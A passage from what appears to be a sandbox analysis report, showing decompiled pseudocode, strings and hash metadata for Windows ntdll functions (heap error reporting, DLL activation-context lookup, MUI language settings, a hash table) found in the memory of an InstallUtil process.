                      • read from, xrefs: 0137B4AD, 0137B4B2
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                      • API String ID: 0-108210295
                      • Opcode ID: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
                      • Instruction ID: 2a638ba4d6c96480741bb1ae0ce68c547315659cb19bfc5a0ac9e80a84521f5b
                      • Opcode Fuzzy Hash: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
                      • Instruction Fuzzy Hash: 5F810235A50204FFEB356A4A8C85EEB7F3AEF56B9DF410048F9052B116D369A441CBB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 44%
                      			E01381C06() {
                      				signed int _t27;
                      				char* _t104;
                      				char* _t105;
                      				intOrPtr _t113;
                      				intOrPtr _t115;
                      				intOrPtr _t117;
                      				intOrPtr _t119;
                      				intOrPtr _t120;
                      
                      				_t105 = 0x12a48a4;
                      				_t104 = "HEAP: ";
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E012CB150();
                      				} else {
                      					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				_push( *0x13b589c);
                      				E012CB150("Heap error detected at %p (heap handle %p)\n",  *0x13b58a0);
                      				_t27 =  *0x13b5898; // 0x0
                      				if(_t27 <= 0xf) {
                      					switch( *((intOrPtr*)(_t27 * 4 +  &M01381E96))) {
                      						case 0:
                      							_t105 = "heap_failure_internal";
                      							goto L21;
                      						case 1:
                      							goto L21;
                      						case 2:
                      							goto L21;
                      						case 3:
                      							goto L21;
                      						case 4:
                      							goto L21;
                      						case 5:
                      							goto L21;
                      						case 6:
                      							goto L21;
                      						case 7:
                      							goto L21;
                      						case 8:
                      							goto L21;
                      						case 9:
                      							goto L21;
                      						case 0xa:
                      							goto L21;
                      						case 0xb:
                      							goto L21;
                      						case 0xc:
                      							goto L21;
                      						case 0xd:
                      							goto L21;
                      						case 0xe:
                      							goto L21;
                      						case 0xf:
                      							goto L21;
                      					}
                      				}
                      				L21:
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E012CB150();
                      				} else {
                      					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				_push(_t105);
                      				E012CB150("Error code: %d - %s\n",  *0x13b5898);
                      				_t113 =  *0x13b58a4; // 0x0
                      				if(_t113 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E012CB150("Parameter1: %p\n",  *0x13b58a4);
                      				}
                      				_t115 =  *0x13b58a8; // 0x0
                      				if(_t115 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E012CB150("Parameter2: %p\n",  *0x13b58a8);
                      				}
                      				_t117 =  *0x13b58ac; // 0x0
                      				if(_t117 != 0) {
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					E012CB150("Parameter3: %p\n",  *0x13b58ac);
                      				}
                      				_t119 =  *0x13b58b0; // 0x0
                      				if(_t119 != 0) {
                      					L41:
                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      						_push(_t104);
                      						E012CB150();
                      					} else {
                      						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      					}
                      					_push( *0x13b58b4);
                      					E012CB150("Last known valid blocks: before - %p, after - %p\n",  *0x13b58b0);
                      				} else {
                      					_t120 =  *0x13b58b4; // 0x0
                      					if(_t120 != 0) {
                      						goto L41;
                      					}
                      				}
                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                      					_push(_t104);
                      					E012CB150();
                      				} else {
                      					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                      				}
                      				return E012CB150("Stack trace available at %p\n", 0x13b58c0);
                      			}












                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                      • API String ID: 0-2897834094
                      • Opcode ID: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
                      • Instruction ID: 5b02b6fee8124c9dec4e034e6b1c95ae600a4bfb2a28bb758030eae57f646c79
                      • Opcode Fuzzy Hash: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
                      • Instruction Fuzzy Hash: C861E733631249DFD611BB49D4C5E7477BCEB04FB4B0A806EF60E9B701D6649C468B0A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 44%
                      			E012F8E00(void* __ecx) {
                      				signed int _v8;
                      				char _v12;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t32;
                      				intOrPtr _t35;
                      				intOrPtr _t43;
                      				void* _t46;
                      				intOrPtr _t47;
                      				void* _t48;
                      				signed int _t49;
                      				void* _t50;
                      				intOrPtr* _t51;
                      				signed int _t52;
                      				void* _t53;
                      				intOrPtr _t55;
                      
                      				_v8 =  *0x13bd360 ^ _t52;
                      				_t49 = 0;
                      				_t48 = __ecx;
                      				_t55 =  *0x13b8464; // 0x761c0110
                      				if(_t55 == 0) {
                      					L9:
                      					if( !_t49 >= 0) {
                      						if(( *0x13b5780 & 0x00000003) != 0) {
                      							E01345510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                      						}
                      						if(( *0x13b5780 & 0x00000010) != 0) {
                      							asm("int3");
                      						}
                      					}
                      					return E0130B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                      				}
                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                      				_t43 =  *0x13b7984; // 0xe62b88
                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                      					if(_t48 == _t43) {
                      						_t50 = 0x5c;
                      						if( *_t32 == _t50) {
                      							_t46 = 0x3f;
                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                      								_t32 = _t32 + 8;
                      							}
                      						}
                      					}
                      					_t51 =  *0x13b8464; // 0x761c0110
                      					 *0x13bb1e0(_t47, _t32,  &_v12);
                      					_t49 =  *_t51();
                      					if(_t49 >= 0) {
                      						L8:
                      						_t35 = _v12;
                      						if(_t35 != 0) {
                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                      								E012F9B10( *((intOrPtr*)(_t48 + 0x48)));
                      								_t35 = _v12;
                      							}
                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                      						}
                      						goto L9;
                      					}
                      					if(_t49 != 0xc000008a) {
                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                      							if(_t49 != 0xc00000bb) {
                      								goto L8;
                      							}
                      						}
                      					}
                      					if(( *0x13b5780 & 0x00000005) != 0) {
                      						_push(_t49);
                      						E01345510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                      						_t53 = _t53 + 0x1c;
                      					}
                      					_t49 = 0;
                      					goto L8;
                      				} else {
                      					goto L9;
                      				}
                      			}

                      APIs
                      Strings
                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0133932A
                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01339357
                      • minkernel\ntdll\ldrsnap.c, xrefs: 0133933B, 01339367
                      • LdrpFindDllActivationContext, xrefs: 01339331, 0133935D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                      • API String ID: 3446177414-3779518884
                      • Opcode ID: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
                      • Instruction ID: 50700f20438361e120f651ecf0230d623be258a1edf9c68af96a679a706af892
                      • Opcode Fuzzy Hash: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
                      • Instruction Fuzzy Hash: 53410932A30316DFEB36AE1C8C89B79F7A8AB44358F06417DFB5457152E7B05C808781
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E012D3D34(signed int* __ecx) {
                      				signed int* _v8;
                      				char _v12;
                      				signed int* _v16;
                      				signed int* _v20;
                      				char _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				char _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int* _v48;
                      				signed int* _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				char _v68;
                      				signed int _t140;
                      				signed int _t161;
                      				signed int* _t236;
                      				signed int* _t242;
                      				signed int* _t243;
                      				signed int* _t244;
                      				signed int* _t245;
                      				signed int _t255;
                      				void* _t257;
                      				signed int _t260;
                      				void* _t262;
                      				signed int _t264;
                      				void* _t267;
                      				signed int _t275;
                      				signed int* _t276;
                      				short* _t277;
                      				signed int* _t278;
                      				signed int* _t279;
                      				signed int* _t280;
                      				short* _t281;
                      				signed int* _t282;
                      				short* _t283;
                      				signed int* _t284;
                      				void* _t285;
                      
                      				_v60 = _v60 | 0xffffffff;
                      				_t280 = 0;
                      				_t242 = __ecx;
                      				_v52 = __ecx;
                      				_v8 = 0;
                      				_v20 = 0;
                      				_v40 = 0;
                      				_v28 = 0;
                      				_v32 = 0;
                      				_v44 = 0;
                      				_v56 = 0;
                      				_t275 = 0;
                      				_v16 = 0;
                      				if(__ecx == 0) {
                      					_t280 = 0xc000000d;
                      					_t140 = 0;
                      					L50:
                      					 *_t242 =  *_t242 | 0x00000800;
                      					_t242[0x13] = _t140;
                      					_t242[0x16] = _v40;
                      					_t242[0x18] = _v28;
                      					_t242[0x14] = _v32;
                      					_t242[0x17] = _t275;
                      					_t242[0x15] = _v44;
                      					_t242[0x11] = _v56;
                      					_t242[0x12] = _v60;
                      					return _t280;
                      				}
                      				if(E012D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                      					_v56 = 1;
                      					if(_v8 != 0) {
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                      					}
                      					_v8 = _t280;
                      				}
                      				if(E012D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                      					_v60 =  *_v8;
                      					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                      					_v8 = _t280;
                      				}
                      				if(E012D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                      					L16:
                      					if(E012D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                      						L28:
                      						if(E012D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                      							L46:
                      							_t275 = _v16;
                      							L47:
                      							_t161 = 0;
                      							L48:
                      							if(_v8 != 0) {
                      								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                      							}
                      							_t140 = _v20;
                      							if(_t140 != 0) {
                      								if(_t275 != 0) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                      									_t275 = 0;
                      									_v28 = 0;
                      									_t140 = _v20;
                      								}
                      							}
                      							goto L50;
                      						}
                      						_t167 = _v12;
                      						_t255 = _v12 + 4;
                      						_v44 = _t255;
                      						if(_t255 == 0) {
                      							_t276 = _t280;
                      							_v32 = _t280;
                      						} else {
                      							_t276 = L012E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                      							_t167 = _v12;
                      							_v32 = _t276;
                      						}
                      						if(_t276 == 0) {
                      							_v44 = _t280;
                      							_t280 = 0xc0000017;
                      							goto L46;
                      						} else {
                      							E0130F3E0(_t276, _v8, _t167);
                      							_v48 = _t276;
                      							_t277 = E01311370(_t276, 0x12a4e90);
                      							_pop(_t257);
                      							if(_t277 == 0) {
                      								L38:
                      								_t170 = _v48;
                      								if( *_v48 != 0) {
                      									E0130BB40(0,  &_v68, _t170);
                      									if(L012D43C0( &_v68,  &_v24) != 0) {
                      										_t280 =  &(_t280[0]);
                      									}
                      								}
                      								if(_t280 == 0) {
                      									_t280 = 0;
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                      									_v44 = 0;
                      									_v32 = 0;
                      								} else {
                      									_t280 = 0;
                      								}
                      								_t174 = _v8;
                      								if(_v8 != 0) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                      								}
                      								_v8 = _t280;
                      								goto L46;
                      							}
                      							_t243 = _v48;
                      							do {
                      								 *_t277 = 0;
                      								_t278 = _t277 + 2;
                      								E0130BB40(_t257,  &_v68, _t243);
                      								if(L012D43C0( &_v68,  &_v24) != 0) {
                      									_t280 =  &(_t280[0]);
                      								}
                      								_t243 = _t278;
                      								_t277 = E01311370(_t278, 0x12a4e90);
                      								_pop(_t257);
                      							} while (_t277 != 0);
                      							_v48 = _t243;
                      							_t242 = _v52;
                      							goto L38;
                      						}
                      					}
                      					_t191 = _v12;
                      					_t260 = _v12 + 4;
                      					_v28 = _t260;
                      					if(_t260 == 0) {
                      						_t275 = _t280;
                      						_v16 = _t280;
                      					} else {
                      						_t275 = L012E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                      						_t191 = _v12;
                      						_v16 = _t275;
                      					}
                      					if(_t275 == 0) {
                      						_v28 = _t280;
                      						_t280 = 0xc0000017;
                      						goto L47;
                      					} else {
                      						E0130F3E0(_t275, _v8, _t191);
                      						_t285 = _t285 + 0xc;
                      						_v48 = _t275;
                      						_t279 = _t280;
                      						_t281 = E01311370(_v16, 0x12a4e90);
                      						_pop(_t262);
                      						if(_t281 != 0) {
                      							_t244 = _v48;
                      							do {
                      								 *_t281 = 0;
                      								_t282 = _t281 + 2;
                      								E0130BB40(_t262,  &_v68, _t244);
                      								if(L012D43C0( &_v68,  &_v24) != 0) {
                      									_t279 =  &(_t279[0]);
                      								}
                      								_t244 = _t282;
                      								_t281 = E01311370(_t282, 0x12a4e90);
                      								_pop(_t262);
                      							} while (_t281 != 0);
                      							_v48 = _t244;
                      							_t242 = _v52;
                      						}
                      						_t201 = _v48;
                      						_t280 = 0;
                      						if( *_v48 != 0) {
                      							E0130BB40(_t262,  &_v68, _t201);
                      							if(L012D43C0( &_v68,  &_v24) != 0) {
                      								_t279 =  &(_t279[0]);
                      							}
                      						}
                      						if(_t279 == 0) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                      							_v28 = _t280;
                      							_v16 = _t280;
                      						}
                      						_t202 = _v8;
                      						if(_v8 != 0) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                      						}
                      						_v8 = _t280;
                      						goto L28;
                      					}
                      				}
                      				_t214 = _v12;
                      				_t264 = _v12 + 4;
                      				_v40 = _t264;
                      				if(_t264 == 0) {
                      					_v20 = _t280;
                      				} else {
                      					_t236 = L012E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                      					_t280 = _t236;
                      					_v20 = _t236;
                      					_t214 = _v12;
                      				}
                      				if(_t280 == 0) {
                      					_t161 = 0;
                      					_t280 = 0xc0000017;
                      					_v40 = 0;
                      					goto L48;
                      				} else {
                      					E0130F3E0(_t280, _v8, _t214);
                      					_t285 = _t285 + 0xc;
                      					_v48 = _t280;
                      					_t283 = E01311370(_t280, 0x12a4e90);
                      					_pop(_t267);
                      					if(_t283 != 0) {
                      						_t245 = _v48;
                      						do {
                      							 *_t283 = 0;
                      							_t284 = _t283 + 2;
                      							E0130BB40(_t267,  &_v68, _t245);
                      							if(L012D43C0( &_v68,  &_v24) != 0) {
                      								_t275 = _t275 + 1;
                      							}
                      							_t245 = _t284;
                      							_t283 = E01311370(_t284, 0x12a4e90);
                      							_pop(_t267);
                      						} while (_t283 != 0);
                      						_v48 = _t245;
                      						_t242 = _v52;
                      					}
                      					_t224 = _v48;
                      					_t280 = 0;
                      					if( *_v48 != 0) {
                      						E0130BB40(_t267,  &_v68, _t224);
                      						if(L012D43C0( &_v68,  &_v24) != 0) {
                      							_t275 = _t275 + 1;
                      						}
                      					}
                      					if(_t275 == 0) {
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                      						_v40 = _t280;
                      						_v20 = _t280;
                      					}
                      					_t225 = _v8;
                      					if(_v8 != 0) {
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                      					}
                      					_v8 = _t280;
                      					goto L16;
                      				}
                      			}

                      Strings
                      • Kernel-MUI-Number-Allowed, xrefs: 012D3D8C
                      • WindowsExcludedProcs, xrefs: 012D3D6F
                      • Kernel-MUI-Language-SKU, xrefs: 012D3F70
                      • Kernel-MUI-Language-Disallowed, xrefs: 012D3E97
                      • Kernel-MUI-Language-Allowed, xrefs: 012D3DC0
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                      • API String ID: 0-258546922
                      • Opcode ID: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
                      • Instruction ID: d707a259e16189f81723f3f130e1e135243da738a75081713d4c646b812c06f7
                      • Opcode Fuzzy Hash: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
                      • Instruction Fuzzy Hash: 03F15F76D20659EFCB15EF98C980AEEBBF9FF08650F14006AE605E7650D7749E01CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 50%
                      			E0139E824(signed int __ecx, signed int* __edx) {
                      				signed int _v8;
                      				signed char _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				unsigned int _v44;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t177;
                      				signed int _t179;
                      				unsigned int _t202;
                      				signed char _t207;
                      				signed char _t210;
                      				signed int _t230;
                      				void* _t244;
                      				unsigned int _t247;
                      				signed int _t288;
                      				signed int _t289;
                      				signed int _t291;
                      				signed char _t293;
                      				signed char _t295;
                      				signed char _t298;
                      				intOrPtr* _t303;
                      				signed int _t310;
                      				signed char _t316;
                      				signed int _t319;
                      				signed char _t323;
                      				signed char _t330;
                      				signed int _t334;
                      				signed int _t337;
                      				signed int _t341;
                      				signed char _t345;
                      				signed char _t347;
                      				signed int _t353;
                      				signed char _t354;
                      				void* _t383;
                      				signed char _t385;
                      				signed char _t386;
                      				unsigned int _t392;
                      				signed int _t393;
                      				signed int _t395;
                      				signed int _t398;
                      				signed int _t399;
                      				signed int _t401;
                      				unsigned int _t403;
                      				void* _t404;
                      				unsigned int _t405;
                      				signed int _t406;
                      				signed char _t412;
                      				unsigned int _t413;
                      				unsigned int _t418;
                      				void* _t419;
                      				void* _t420;
                      				void* _t421;
                      				void* _t422;
                      				void* _t423;
                      				signed char* _t425;
                      				signed int _t426;
                      				signed int _t428;
                      				unsigned int _t430;
                      				signed int _t431;
                      				signed int _t433;
                      
                      				_v8 =  *0x13bd360 ^ _t433;
                      				_v40 = __ecx;
                      				_v16 = __edx;
                      				_t289 = 0x4cb2f;
                      				_t425 = __edx[1];
                      				_t403 =  *__edx << 2;
                      				if(_t403 < 8) {
                      					L3:
                      					_t404 = _t403 - 1;
                      					if(_t404 == 0) {
                      						L16:
                      						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                      						L17:
                      						_t426 = _v40;
                      						_v20 = _t426 + 0x1c;
                      						_t177 = L012EFAD0(_t426 + 0x1c);
                      						_t385 = 0;
                      						while(1) {
                      							L18:
                      							_t405 =  *(_t426 + 4);
                      							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                      							_t316 = _t289 & _t179;
                      							_v24 = _t179;
                      							_v32 = _t316;
                      							_v12 = _t316 >> 0x18;
                      							_v36 = _t316 >> 0x10;
                      							_v28 = _t316 >> 8;
                      							if(_t385 != 0) {
                      								goto L21;
                      							}
                      							_t418 = _t405 >> 5;
                      							if(_t418 == 0) {
                      								_t406 = 0;
                      								L31:
                      								if(_t406 == 0) {
                      									L35:
                      									E012EFA00(_t289, _t316, _t406, _t426 + 0x1c);
                      									 *0x13bb1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                      									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                      									_v36 = _t319;
                      									if(_t319 != 0) {
                      										asm("stosd");
                      										asm("stosd");
                      										asm("stosd");
                      										_t408 = _v16;
                      										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                      										 *((char*)(_t319 + 0xb)) =  *_v16;
                      										 *(_t319 + 4) = _t289;
                      										_t53 = _t319 + 0xc; // 0xc
                      										E012E2280(E0130F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                      										_t428 = _v40;
                      										_t386 = 0;
                      										while(1) {
                      											L38:
                      											_t202 =  *(_t428 + 4);
                      											_v16 = _v16 | 0xffffffff;
                      											_v16 = _v16 << (_t202 & 0x0000001f);
                      											_t323 = _v16 & _t289;
                      											_v20 = _t323;
                      											_v20 = _v20 >> 0x18;
                      											_v28 = _t323;
                      											_v28 = _v28 >> 0x10;
                      											_v12 = _t323;
                      											_v12 = _v12 >> 8;
                      											_v32 = _t323;
                      											if(_t386 != 0) {
                      												goto L41;
                      											}
                      											_t247 = _t202 >> 5;
                      											_v24 = _t247;
                      											if(_t247 == 0) {
                      												_t412 = 0;
                      												L50:
                      												if(_t412 == 0) {
                      													L53:
                      													_t291 =  *(_t428 + 4);
                      													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                      													_v44 =  *(_t428 + 0x24);
                      													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                      													_t207 = _t291 >> 5;
                      													if( *_t428 < _t207 + _t207) {
                      														L74:
                      														_t430 = _t291 >> 5;
                      														_t293 = _v36;
                      														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                      														_v44 = _t210;
                      														_t159 = _t430 - 1; // 0xffffffdf
                      														_t428 = _v40;
                      														_t330 =  *(_t428 + 8);
                      														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                      														_t412 = _t293;
                      														 *_t293 =  *(_t330 + _t386 * 4);
                      														 *(_t330 + _t386 * 4) = _t293;
                      														 *_t428 =  *_t428 + 1;
                      														_t289 = 0;
                      														L75:
                      														E012DFFB0(_t289, _t412, _t428 + 0x1c);
                      														if(_t289 != 0) {
                      															_t428 =  *(_t428 + 0x24);
                      															 *0x13bb1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                      															 *_t428();
                      														}
                      														L77:
                      														return E0130B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                      													}
                      													_t334 = 2;
                      													_t207 = E012FF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                      													if(_t207 < 0) {
                      														goto L74;
                      													}
                      													_t413 = _v24;
                      													if(_t413 < 4) {
                      														_t413 = 4;
                      													}
                      													 *0x13bb1e0(_t413 << 2, _v28);
                      													_t207 =  *_v32();
                      													_t386 = _t207;
                      													_v16 = _t386;
                      													if(_t386 == 0) {
                      														_t291 =  *(_t428 + 4);
                      														if(_t291 >= 0x20) {
                      															goto L74;
                      														}
                      														_t289 = _v36;
                      														_t412 = 0;
                      														goto L75;
                      													} else {
                      														_t108 = _t413 - 1; // 0x3
                      														_t337 = _t108;
                      														if((_t413 & _t337) == 0) {
                      															L62:
                      															if(_t413 > 0x4000000) {
                      																_t413 = 0x4000000;
                      															}
                      															_t295 = _t386;
                      															_v24 = _v24 & 0x00000000;
                      															_t392 = _t413 << 2;
                      															_t230 = _t428 | 0x00000001;
                      															_t393 = _t392 >> 2;
                      															asm("sbb ecx, ecx");
                      															_t341 =  !(_v16 + _t392) & _t393;
                      															if(_t341 <= 0) {
                      																L67:
                      																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                      																_v32 = _t395;
                      																_v20 = 0;
